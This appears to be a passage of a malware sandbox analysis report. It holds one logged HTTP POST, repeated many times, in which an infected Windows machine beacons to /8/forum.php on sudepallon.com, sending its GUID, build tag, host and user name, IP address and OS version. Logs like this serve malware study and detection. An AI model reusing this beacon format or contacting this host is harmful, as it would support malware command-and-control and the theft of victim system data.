                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
